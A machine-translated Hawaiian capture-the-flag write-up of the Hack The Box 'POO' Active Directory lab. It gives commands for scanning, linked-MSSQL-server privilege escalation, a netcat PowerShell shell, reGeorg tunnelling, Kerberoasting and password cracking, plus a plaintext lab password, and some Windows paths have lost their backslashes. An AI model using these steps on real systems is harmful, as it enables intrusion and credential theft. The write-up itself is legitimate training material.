Ma kēia ʻatikala e nānā mākou i ka hele ʻana o ka mīkini, akā he mini-laboratory holoʻokoʻa mai ka pūnaewele
E like me ka mea i hōʻike ʻia ma ka wehewehe ʻana, ua hoʻolālā ʻia ka POO e hoʻāʻo i nā mākau ma nā pae āpau o ka hoʻouka ʻana ma kahi wahi Active Directory liʻiliʻi. ʻO ka pahuhopu ka hoʻopaʻapaʻa ʻana i kahi mea hoʻokipa hiki ke loaʻa, e hoʻonui i nā pono, a i ka hopena e hoʻololi i ka pūnaewele holoʻokoʻa i ka ʻohi ʻana i nā hae 5.
ʻO ka pilina i ka hale hana ma o VPN. Manaʻo ʻia ʻaʻole e hoʻopili mai kahi kamepiula hana a i ʻole mai kahi pūʻali i loaʻa ka ʻikepili koʻikoʻi iā ʻoe, no ka mea ua hoʻopau ʻoe i kahi pūnaewele pilikino me nā poʻe i ʻike i kekahi mea ma ke kahua o ka palekana ʻike :)
ʻIke hoʻonohonoho
No ke kōkua ʻana iā ʻoe e hoʻomau i nā ʻatikala hou, lako polokalamu, a me nā ʻike ʻē aʻe, ua hana wau
Hōʻike ʻia nā ʻike āpau no nā kumu hoʻonaʻauao wale nō. ʻAʻole ʻae ka mea kākau o kēia palapala i kekahi kuleana no nā pōʻino i hana ʻia i kekahi ma muli o ka hoʻohana ʻana i ka ʻike a me nā ʻenehana i loaʻa mai ke aʻo ʻana i kēia palapala.
Intro
He ʻelua mīkini kēia endgame, a he 5 mau hae.
Hāʻawi ʻia kahi wehewehe a me ka helu wahi o ka mea hoʻokipa i loaʻa.
E hoʻomaka kākou!
Hae hou
Aia kēia mīkini i kahi helu IP o 10.13.38.11, aʻu e hoʻohui ai i /etc/hosts.
10.13.38.11 poo.htb
ʻO ka mea mua, nānā mākou i nā awa hāmama. No ka lōʻihi o ka nānā ʻana i nā awa āpau me ka nmap, e hana mua wau i kēia me ka masscan. Nānā mākou i nā awa TCP a me UDP mai ka interface tun0 i ka wikiwiki o 500 packets i kekona.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
I kēia manawa, no ka loaʻa ʻana o ka ʻike kikoʻī e pili ana i nā lawelawe e holo ana ma nā awa, e holo mākou i kahi scan me ke koho -A.
nmap -A poo.htb -p80,1433
No laila, loaʻa iā mākou nā lawelawe IIS a me MSSQL. I kēia hihia, e ʻike mākou i ka inoa DNS maoli o ka domain a me ka kamepiula. Ma ka pūnaewele pūnaewele hoʻokipa ʻia mākou e ka ʻaoʻao home IIS.
E hele kāua i nā papa kuhikuhi. Hoʻohana au i ka gobuster no kēia. Ma nā ʻāpana, hōʻike mākou i ka helu o nā milo 128 (-t), URL (-u), puke wehewehe ʻōlelo (-w) a me nā mea hoʻonui e hoihoi iā mākou (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Hāʻawi kēia iā mākou i ka hōʻoia HTTP no ka papa kuhikuhi /admin, a me kahi faila .DS_Store hiki ke loaʻa. .DS_Store nā waihona e mālama i nā hoʻonohonoho maʻamau no kahi waihona, e like me ka papa inoa o nā faila, nā wahi ikona, a me ke kiʻi hope i koho ʻia. Loaʻa paha ia faila i ka papa kuhikuhi kikowaena pūnaewele o nā mea hoʻomohala pūnaewele. Ma kēia ala e loaʻa ai iā mākou ka ʻike e pili ana i nā mea o ka papa kuhikuhi. No kēia hiki iā ʻoe ke hoʻohana
python3 dsstore_crawler.py -i http://poo.htb/
Loaʻa iā mākou nā mea o ka papa kuhikuhi. ʻO ka mea hoihoi loa ma aneʻi ʻo ka papa kuhikuhi / dev, kahi e hiki ai iā mākou ke nānā i nā kumu a me nā faila db ma nā lālā ʻelua. Akā hiki iā mākou ke hoʻohana i nā huaʻōlelo 6 mua o nā faila a me nā inoa papa kuhikuhi inā pilikia ka lawelawe iā IIS ShortName. Hiki iā ʻoe ke nānā no kēia nāwaliwali me ka hoʻohana ʻana
A ʻike mākou i hoʻokahi faila kikokikona e hoʻomaka me "poo_co". Me ka ʻike ʻole i ka mea e hana ai ma hope, ua koho wale au i nā huaʻōlelo a pau e hoʻomaka ana me "co" mai ka puke wehewehe ʻōlelo.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
A e hoʻokaʻawale mākou iā ia me ka hoʻohana ʻana i ka wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
A ʻike mākou i ka ʻōlelo kūpono! Nānā mākou i kēia faila, mālama i nā hōʻoia (e hoʻoholo ʻia e ka parameter DBNAME, mai MSSQL lākou).
Hāʻawi mākou i ka hae a holomua mākou i 20%.
Hae hae
Hoʻopili mākou iā MSSQL, hoʻohana wau iā DBeaver.
ʻAʻole mākou i ʻike i kahi mea hoihoi i kēia waihona, e hana mākou i kahi SQL Editor a nānā i nā mea hoʻohana.
SELECT name FROM master..syslogins;
Loaʻa iā mākou ʻelua mea hoʻohana. E nānā kāua i nā pono.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
No laila, ʻaʻohe pono. E nānā kākou i nā kikowaena pili, ua kākau au e pili ana i kēia ʻenehana i ka kikoʻī
SELECT * FROM master..sysservers;
ʻO kēia ke ʻano e ʻike ai mākou i kahi SQL Server hou. E hoʻāʻo kākou i ka hoʻokō ʻana i nā kauoha ma kēia kikowaena me ka hoʻohana ʻana i openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
A hiki iā mākou ke kūkulu i kahi lāʻau nīnau.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
ʻO ke kumu, ke noi mākou i kahi kikowaena pili, hoʻokō ʻia ka noi ma ka pōʻaiapili o kekahi mea hoʻohana! E ʻike kākou ma ka pōʻaiapili o ka mea hoʻohana a mākou e hana nei ma kahi kikowaena pili.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
I kēia manawa e ʻike kākou i ka pōʻaiapili i noi ʻia mai kahi kikowaena pili i kā mākou!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
No laila ʻo ka pōʻaiapili DBO pono e loaʻa nā pono āpau. E nānā kākou i nā pono inā he noi mai kahi kikowaena pili.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
E like me kāu e ʻike ai, loaʻa iā mākou nā pono āpau! E hana mākou i kā mākou admin ponoʻī e like me kēia. Akā ʻaʻole lākou e ʻae iā ia ma o openquery, e hana mākou ma o EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
A i kēia manawa ke hoʻopili nei mākou me nā hōʻoia o ka mea hoʻohana hou, nānā mākou i ka waihona waihona hae hou.
Hāʻawi mākou i kēia hae a neʻe aku.
Hae BackTrack
E kiʻi i kahi pūpū me MSSQL, hoʻohana wau i ka mssqlclient mai ka pūʻulu impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Pono mākou e kiʻi i nā ʻōlelo huna, a ʻo ka mea mua a mākou i ʻike ai he pūnaewele. No laila, pono mākou i kahi kikowaena kikowaena pūnaewele (ʻaʻole hiki ke waiho i kahi pūpū kūpono, ʻike ʻia ke holo nei ka pā ahi).
Akā hōʻole ʻia ke komo ʻana. ʻOiai hiki iā mākou ke heluhelu i ka faila mai MSSQL, pono mākou e ʻike i nā ʻōlelo hoʻonohonoho i hoʻonohonoho ʻia. A ma ka papa kuhikuhi MSSQL ʻike mākou aia ʻo Python.
A laila ʻaʻohe pilikia i ka heluhelu ʻana i ka faila web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Me nā ʻike i loaʻa, e hele i /admin a lawe i ka hae.
Hae wāwae
ʻO kaʻoiaʻiʻo, aia kekahi mau pilikia mai ka hoʻohana ʻana i kahi pā ahi, akā ke nānā nei i nā hoʻonohonoho pūnaewele, ʻike mākou ua hoʻohana pū ʻia ʻo IPv6!
E hoʻohui i kēia helu wahi i /etc/hosts.
dead:babe::1001 poo6.htb
E nānā hou i ka mea hoʻokipa, akā me ka hoʻohana ʻana i ka protocol IPv6.
A loaʻa ka lawelawe WinRM ma luna o IPv6. E hoʻopili kākou me nā hōʻoia i ʻike ʻia.
Aia ka hae ma ka papapihi, hāʻawi mākou iā ia.
Hae P00ned
Ma hope o ka hana reconnaissance i ka mea hoʻokipa me ka hoʻohana
setspn.exe -T intranet.poo -Q */*
E holo kāua i ke kauoha ma MSSQL.
Ke hoʻohana nei i kēia ʻano, loaʻa iā mākou ka SPN o nā mea hoʻohana p00_hr a me p00_adm, ʻo ia hoʻi, ua pilikia lākou i ka hoʻouka ʻana e like me Kerberoasting. I ka pōkole, hiki iā mākou ke kiʻi i kā lākou ʻōlelo huna hashes.
Pono mua ʻoe e kiʻi i kahi pūpū paʻa ma ke ʻano he mea hoʻohana MSSQL. Akā ʻoiai ua kaupalena ʻia mākou i ke komo ʻana, loaʻa iā mākou ke kamaʻilio me ka mea hoʻokipa ma o nā awa 80 a me 1433 wale nō. Akā hiki ke hoʻokaʻawale i nā kaʻa ma ke awa 80! No kēia e hoʻohana mākou
Akā, ke ho'āʻo mākou e komo iā ia, loaʻa iā mākou kahi hewa 404. ʻO ia hoʻi ʻaʻole i hoʻokō ʻia nā faila * .aspx. I mea e hoʻokō ʻia ai nā faila me kēia mau hoʻonui, e hoʻokomo iā ASP.NET 4.5 penei.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
A i kēia manawa, ke komo mākou i ka tunnel.aspx, loaʻa iā mākou kahi pane ua mākaukau nā mea āpau e hele.
E hoʻomaka kākou i ka ʻāpana o ka mea kūʻai aku o ka palapala noi, kahi e hoʻokuʻu ai i ke kaʻa. E hoʻouna mākou i nā kaʻa āpau mai ke awa 5432 i ke kikowaena.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
A ke hoʻohana nei mākou i nā kaulahao proxy e hoʻouna i nā kaʻa o kekahi noi ma o kā mākou proxy. E hoʻohui i kēia koho i ka faila hoʻonohonoho /etc/proxychains.conf.
I kēia manawa e hoʻouka i ka polokalamu i ke kikowaena
I kēia manawa hoʻomaka mākou i ka mea hoʻolohe ma MSSQL.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
A pili mākou ma o kā mākou proxy.
proxychains rlwrap nc poo.htb 4321
A e kiʻi kāua i nā hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
A laila pono ʻoe e hoʻololi i kēia mau hashes. No ka loaʻa ʻole o kēia mau huaʻōlelo i loko o ka puke wehewehe ʻōlelo rockyou, ua hoʻohana wau i nā puke wehewehe huaʻōlelo a pau i hāʻawi ʻia ma Seclists. No ka huli ʻana, hoʻohana mākou i ka hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
A ʻike mākou i nā ʻōlelo huna ʻelua, ʻo ka mua ma ka puke wehewehe ʻōlelo dutch_passwordlist.txt, a ʻo ka lua ma Keyboard-Combinations.txt.
A no laila, ʻekolu kā mākou mea hoʻohana, e hele kāua i ka mea hoʻokele domain. ʻIke mua mākou i kāna helu wahi.
Nui, ua ʻike mākou i ka helu IP o ka mea hoʻokele domain. E ʻike kākou i nā mea hoʻohana a pau o ka domain, a ʻo wai o lākou he luna hoʻomalu. No ka hoʻoiho ʻana i ka palapala e loaʻa ai ka ʻike PowerView.ps1. A laila e hoʻopili mākou me ka hoʻohana ʻana i ka evil-winrm, e kuhikuhi ana i ka papa kuhikuhi me ka palapala i ka -s parameter. A laila e hoʻouka wale mākou i ka palapala PowerView.
I kēia manawa hiki iā mākou ke komo i kāna mau hana a pau. Ua like ka mea hoʻohana p00_adm me he mea hoʻohana pono, no laila e hana mākou ma kāna pōʻaiapili. E hana kākou i mea PSCredential no kēia mea hoʻohana.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
I kēia manawa, e hoʻokō ʻia nā kauoha Powershell a mākou e kuhikuhi ai iā Creds e like me p00_adm. E hōʻike mākou i kahi papa inoa o nā mea hoʻohana a me ke ʻano AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
A no laila, pono maoli kā mākou mea hoʻohana. E ʻike kākou i kona hui.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Ua hōʻoia hope mākou he luna hoʻomalu ka mea hoʻohana. Hāʻawi kēia iā ia i ke kuleana e hoʻopaʻa inoa i ka mea hoʻokele domain ma kahi mamao. E ho'āʻo kākou e komo ma o WinRM me ka hoʻohana ʻana i kā mākou tunnel. Ua pilikia au i nā hewa i hana ʻia e reGeorg i ka wā e hoʻohana ai i ka evil-winrm.
A laila e hoʻohana kākou i kekahi mea maʻalahi,
Ho'āʻo mākou e hoʻohui, a aia mākou i loko o ka ʻōnaehana.
Akā, ʻaʻohe hae. A laila e nānā i ka mea hoʻohana a nānā i nā pākaukau.
Loaʻa iā mākou ka hae ma mr3ks a 100% paʻa ka hale hana.
ʻo ia wale nō. Ma ke ʻano he manaʻo manaʻo, e ʻoluʻolu e ʻōlelo inā ua aʻo ʻoe i kekahi mea hou mai kēia ʻatikala a inā he mea pono ia iā ʻoe.
Hiki iā ʻoe ke hui pū me mākou ma
Source: www.habr.com